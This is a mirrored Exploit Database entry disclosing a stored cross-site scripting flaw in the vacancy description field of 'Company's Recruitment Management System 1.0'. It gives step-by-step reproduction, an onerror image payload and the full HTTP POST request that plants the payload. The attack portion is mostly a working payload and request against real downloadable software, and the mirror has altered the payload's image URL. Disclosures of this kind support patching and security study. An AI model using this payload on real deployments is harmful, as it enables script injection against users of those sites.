Company’s Recruitment Management System 1.0 – ‘description’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 104 阅读

• 作者： Aniket Deshmane
  日期： 2021-10-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50424/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: Company&apos;s Recruitment Management System 1.0 -&apos;description&apos; Stored Cross-Site Scripting (XSS) # Date: 18-10-2021 # Exploit Author: Aniket Anil Deshmane # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Version: 1 # Tested on: Windows 10,XAMPP   Step to reproduce:- 1)Login with staff account & Navigate toVacancies tab.   2)Click on add new vacancies .Put any random informationon other field except description & go to the description window .   3)In the description fieldselect insertlink .   5) In Text to display the field add the following payload .   "><img src=x onerror=alert(1)>   *6)Click on save & you are done.It&apos;s gonna be triggered when some one open vacancies details*   Request:-   POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------156186133432167175201476666002 Content-Length: 1012 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/employment_application/admin/?page=vacancies Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin   -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="id"     -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="title"   Test1ee -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="designation_id"   4 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="slots"   1 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="status"   1 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="description"   <p><br><a href="http://google.com" target="_blank">"><img src="https://www.exploit-db.com/exploits/50424/x" onerror="alert(1)"></a></p> -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream     -----------------------------156186133432167175201476666002--